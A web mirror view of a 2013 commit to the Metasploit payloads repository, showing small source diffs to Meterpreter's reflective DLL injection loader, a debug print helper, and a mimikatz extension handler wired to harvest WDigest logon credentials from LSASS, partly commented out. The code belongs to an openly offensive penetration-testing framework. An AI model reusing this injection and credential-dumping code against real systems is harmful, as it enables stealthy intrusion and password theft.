github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

Working comms

Browse Source
This commit is contained in:
Meatballs 2013-04-19 22:18:44 +01:00
parent 21e2b1fecf
commit 39872d239b
4 changed files with 15 additions and 20 deletions
c/meterpreter/source
ReflectiveDLLInjection
ReflectiveLoader.cReflectiveLoader.h
common
common.h
extensions/mimikatz
main.cpp

2
c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c

@ -183,7 +183,7 @@ geteip:
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH || dwHashValue == VIRTUALLOCK_HASH || dwHashValue == OUTPUTDEBUG_HASH )

2
c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h

@ -63,7 +63,7 @@ __forceinline DWORD ror( DWORD d )
__forceinline DWORD hash( char * c )
__forceinline DWORD _hash( char * c )
{
register DWORD h = 0;
do

2
c/meterpreter/source/common/common.h

@ -203,7 +203,7 @@ static void real_dprintf(char *format, ...) {
va_start(args,format);
vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugString(buffer);
OutputDebugStringA(buffer);
}
#endif

29
c/meterpreter/source/extensions/mimikatz/main.cpp

@ -36,31 +36,26 @@ EnableDelayLoadMetSrv();
DWORD request_boiler(Remote *remote, Packet *packet)
{
packet_transmit_response(0, remote, packet);
FILE *ficheiro = fopen("c:\\test.txt", "wb");
fclose(ficheiro);
std::wofstream logFile( "c:\\out.txt");
std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf());
std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf());
Packet * response = packet_create_response(packet);
bool result = 0;
//std::wofstream logFile( "c:\\out.txt");
//std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf());
//std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf());
vector<wstring> * mesArguments = new vector<wstring>();
mimikatz * myMimiKatz = new mimikatz(mesArguments);
//mimikatz * myMimiKatz = new mimikatz(mesArguments);
vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData, wstring(L"wdigest")));
//result = mod_mimikatz_sekurlsa_wdigest::getWDigest(mesArguments);
/*
if (mod_mimikatz_sekurlsa::searchLSASSDatas())
{
mod_mimikatz_sekurlsa::getLogonData(mesArguments, &monProvider);
}
std::wcout.rdbuf(outbuf);
std::wcerr.rdbuf(errbuf);
packet_transmit_response(0, remote, packet);
return 0;
}*/
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
Command customCommands[] =